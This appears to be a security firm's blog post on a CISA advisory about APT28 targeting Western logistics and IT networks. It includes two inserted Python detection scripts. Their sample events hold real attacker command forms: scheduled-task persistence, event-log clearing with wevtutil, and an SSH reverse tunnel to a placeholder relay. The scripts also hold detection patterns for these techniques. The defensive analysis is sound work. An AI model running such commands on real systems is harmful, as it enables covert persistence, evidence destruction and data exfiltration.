Embedded Access: GRU Unit 26165 Targeting Western Logistics and Tech Infrastructure

  • Writer: Clay Mobley
  • 2 days ago
  • 2 min read

On May 21, 2025, the U.S. Cybersecurity and Infrastructure Security Agency (CISA), in collaboration with allied partners, issued Advisory AA25-141A. It confirms an ongoing cyberespionage campaign by Russia’s GRU Unit 26165 (APT28, also known as Fancy Bear), targeting logistics and technology networks directly tied to Western support for Ukraine.

This is not speculative. These actors are inside operational networks right now.

Targets and Operational Focus

Since early 2022, Russian military cyber units have been collecting intelligence on:

  • Defense and weapons logistics

  • Commercial shipping and air cargo

  • Port, rail, and airport infrastructure

  • Maritime tracking systems and air traffic control (ATC)

  • IT services supporting NATO-aligned missions

Compromised entities span the U.S., Germany, Poland, Romania, Czech Republic, Moldova, France, Italy, and more (CISA Advisory; Critical Path Security).

Tactics and Toolsets

GRU’s cyber operators are using reliable, well-obfuscated tools to access and persist inside these networks.

Initial Access Techniques

  • Brute force and credential stuffing through anonymized nodes (Tor, commercial VPNs)

  • Spearphishing with spoofed Microsoft 365 login portals

  • Exploits: CVE-2023-23397 (Outlook NTLM leak), CVE-2023-38831 (WinRAR archive vulnerability)
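The first bullet is the one most defenders can see in their own logs. The script below is an added example, not code from CISA or from this post: it runs two rules over failed-logon records, a burst rule for brute force and a distinct-account rule for credential stuffing, and enriches hits with an anonymizer check. The record format (`timestamp|source_ip|account|outcome`, modelled loosely on Windows Security event 4625), the thresholds, and the `ANON_EXIT_NODES` set are all constructed assumptions; in production the set would be fed from a real Tor-exit or VPN-egress list.

```python
"""Detect brute-force and credential-stuffing patterns in failed-logon records.

Added example, not code from CISA or the post. Records are constructed in
the style of Windows Security event 4625 (failed logon), reduced to
timestamp|source_ip|account|outcome. ANON_EXIT_NODES stands in for a real
Tor-exit / commercial-VPN egress feed and holds constructed documentation
addresses only.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed placeholder for an anonymizer egress feed (RFC 5737 test addresses).
ANON_EXIT_NODES = {"198.51.100.7", "203.0.113.40"}

WINDOW = timedelta(minutes=5)   # burst window for the brute-force rule
FAIL_THRESHOLD = 10             # failures from one source inside WINDOW
SPRAY_USER_THRESHOLD = 5        # distinct accounts from one source -> stuffing/spray


def parse_record(line):
    """Split a constructed 'ts|src|user|outcome' record into a dict."""
    ts, src, user, outcome = line.strip().split("|")
    return {"ts": datetime.fromisoformat(ts), "src": src,
            "user": user, "failed": outcome == "FAIL"}


def max_failures_in_window(events):
    """Largest number of failures from one source inside any WINDOW-long span."""
    events = sorted(events, key=lambda e: e["ts"])
    best, lo = 0, 0
    for hi, ev in enumerate(events):
        while ev["ts"] - events[lo]["ts"] > WINDOW:
            lo += 1
        best = max(best, hi - lo + 1)
    return best


def detect_auth_abuse(lines):
    """Return one finding per source IP whose failures match a rule."""
    failed_by_src = defaultdict(list)
    for rec in map(parse_record, lines):
        if rec["failed"]:
            failed_by_src[rec["src"]].append(rec)

    findings = []
    for src, evs in failed_by_src.items():
        users = {e["user"] for e in evs}
        tags = []
        # Brute force: many failures against few accounts in a short burst.
        if max_failures_in_window(evs) >= FAIL_THRESHOLD:
            tags.append("brute_force")
        # Credential stuffing / spraying: one source cycling through many accounts.
        if len(users) >= SPRAY_USER_THRESHOLD:
            tags.append("credential_stuffing")
        if tags:
            findings.append({
                "src": src,
                "failures": len(evs),
                "distinct_users": len(users),
                "via_anonymizer": src in ANON_EXIT_NODES,  # enrichment, raises priority
                "tags": tags,
            })
    return findings


# Constructed sample: a 12-attempt burst on one account, a slow walk across six
# accounts from a second source, and ordinary failures from a workstation.
SAMPLE_LOG = (
    [f"2025-05-20T08:{i // 10:02d}:{(i % 10) * 6:02d}|198.51.100.7|jsmith|FAIL"
     for i in range(12)]
    + [f"2025-05-20T09:{i * 4:02d}:00|203.0.113.40|{u}|FAIL"
       for i, u in enumerate(["alice", "bob", "carol", "dave", "erin", "frank"])]
    + ["2025-05-20T10:00:00|192.0.2.10|gwen|FAIL",
       "2025-05-20T10:00:30|192.0.2.10|gwen|OK",
       "2025-05-20T10:01:00|192.0.2.10|gwen|FAIL"]
)

if __name__ == "__main__":
    for finding in detect_auth_abuse(SAMPLE_LOG):
        print(finding)
```

The two rules are deliberately separate: a credential-stuffing source stays under the per-window burst threshold by design, so a detection that only counts failures per source will miss it while the distinct-account rule catches it. The anonymizer flag does not decide anything on its own; it is there so the finding can be prioritised over an internal host with a mistyped password.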

Post-Compromise Activity

  • Impacket and PsExec for lateral movement

  • Scheduled tasks created via schtasks

  • OpenSSH and remote desktop protocols tunneled over non-standard ports

Exfiltration Tactics

  • Shared mailbox access for persistent surveillance

  • Log deletion using wevtutil

  • Data exfil via encrypted SSH tunnels (CISA)
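The Post-Compromise Activity and Exfiltration Tactics lists above are all visible in process-creation telemetry. The script below is an added example, not code from CISA or from this post: it runs a small rule set over constructed process events (modelled on Windows event 4688 / Sysmon event 1 and reduced to host, parent image, image and command line) and tags scheduled-task creation, `wevtutil` log clearing, SSH tunnels on non-standard ports, and the command-line artifacts of Impacket's wmiexec and of PsExec. Hostnames, paths, ports and addresses in the sample are placeholders.

```python
"""Flag post-compromise and exfiltration TTPs in process-creation telemetry.

Added example, not code from CISA or the post. Events are constructed in the
style of Windows event 4688 / Sysmon event 1, reduced to host, parent image,
image and command line. The rules map to the techniques the advisory lists:
schtasks persistence, wevtutil log clearing, SSH tunnels on non-standard
ports, and Impacket (wmiexec) / PsExec lateral-movement artifacts.
"""
import re

STANDARD_SSH_PORTS = {22}

# Command-line rules: (tag, compiled pattern).
RULES = [
    # Persistence via a newly created scheduled task.
    ("persistence_scheduled_task",
     re.compile(r"\bschtasks(?:\.exe)?\b.*\s/create\b", re.I)),
    # Defense evasion: clearing an event log channel.
    ("defense_evasion_log_clear",
     re.compile(r"\bwevtutil(?:\.exe)?\b.*\s(?:cl|clear-log)\b", re.I)),
    # Impacket wmiexec redirects command output into ADMIN$ on loopback.
    ("lateral_movement_impacket_wmiexec",
     re.compile(r"cmd\.exe\s+/Q\s+/c\s+.*\\\\127\.0\.0\.1\\ADMIN\$\\__\d+", re.I)),
]

SSH_RE = re.compile(r"(?:^|[\\/\s])ssh(?:\.exe)?\s", re.I)
SSH_PORT_RE = re.compile(r"\s-p\s*(\d+)\b")        # -p is case-sensitive in ssh
SSH_TUNNEL_RE = re.compile(r"\s-[RLD]\s*\S+")      # remote/local/dynamic forward


def classify(event):
    """Return the list of TTP tags that apply to one process-creation event."""
    cmd = event["cmdline"]
    tags = [tag for tag, pattern in RULES if pattern.search(cmd)]
    # PsExec runs the remote command under its PSEXESVC service binary.
    if event["parent"].lower().endswith("psexesvc.exe"):
        tags.append("lateral_movement_psexec_service")
    if SSH_RE.search(cmd):
        port = SSH_PORT_RE.search(cmd)
        if port and int(port.group(1)) not in STANDARD_SSH_PORTS:
            tags.append("ssh_nonstandard_port")
        if SSH_TUNNEL_RE.search(cmd):
            tags.append("ssh_tunnel")
    return tags


def analyze(events):
    """Return a finding for every event that matched at least one rule."""
    findings = []
    for ev in events:
        tags = classify(ev)
        if tags:
            findings.append({"host": ev["host"], "image": ev["image"], "tags": tags})
    return findings


# Constructed sample events (hosts, paths and addresses are placeholders).
SAMPLE_EVENTS = [
    {"host": "WS-101", "parent": "explorer.exe", "image": "schtasks.exe",
     "cmdline": r'schtasks /create /sc minute /mo 30 /tn "Updater" /tr C:\Users\Public\svc.exe'},
    {"host": "SRV-FS02", "parent": "cmd.exe", "image": "wevtutil.exe",
     "cmdline": "wevtutil cl Security"},
    {"host": "WS-103", "parent": "cmd.exe", "image": "ssh.exe",
     "cmdline": "ssh -p 2222 -R 8443:127.0.0.1:3389 user@relay.example.invalid"},
    {"host": "SRV-DC01", "parent": "WmiPrvSE.exe", "image": "cmd.exe",
     "cmdline": r"cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1716300000.12 2>&1"},
    {"host": "SRV-APP04", "parent": "PSEXESVC.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe"},
    # Benign: querying a task and an SSH session on the standard port.
    {"host": "WS-200", "parent": "cmd.exe", "image": "schtasks.exe",
     "cmdline": "schtasks /query /tn Updater"},
    {"host": "WS-201", "parent": "powershell.exe", "image": "ssh.exe",
     "cmdline": "ssh -p 22 admin@jumphost.example.invalid"},
]

if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(finding)
```

The two benign events at the end are the important ones for tuning: `schtasks /query` and `ssh -p 22` must not fire, or the rule set drowns in administrator noise. A `wevtutil cl` hit is worth escalating on its own, because clearing a channel is also the point at which the rest of the host's history stops being trustworthy, so the alert needs to be forwarded off-host before it can be deleted.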

Strategic Implications

This campaign is about visibility, not disruption—yet. GRU is watching the flow of Western materiel, aid, and information. By targeting logistics and IT backbone infrastructure, they gain pre-crisis access and leverage.

This is classic pre-positioning. Map the routes now. Decide when to strike later.

The most affected sectors are:

  • Third-party logistics (3PLs)

  • Defense contractors and subcontractors

  • Telecom and hosting providers

  • Cloud-based IT service firms

If your network touches movement, weapons, or bandwidth to Ukraine—you are a live target.

Cheshire Recommendations

  1. Audit and hunt for known TTPs and IOCs. Use the full IOC list provided in AA25-141A and in the NSA/FBI advisories.

  2. Segment communications systems from operational networks. Treat systems used for partner coordination as high-side.

  3. Lock down external IT providers. Several breaches exploited third-party access paths (Critical Path).

  4. Use strict access controls and 2FA on all remote systems. Credential reuse and poor MFA are still the weakest links.

  5. Establish direct communication with CISA and the FBI. These campaigns are not isolated. Intelligence sharing is part of the mitigation strategy (CISA Shields Up).

At Cheshire Institute, we don’t treat these campaigns as IT problems. We treat them as what they are—intelligence operations.

If your organization is moving critical goods or providing enabling services, your threat surface includes state actors. We help you map it, contain it, and prepare for escalation.

You are not just supporting logistics. You are part of the operating picture.
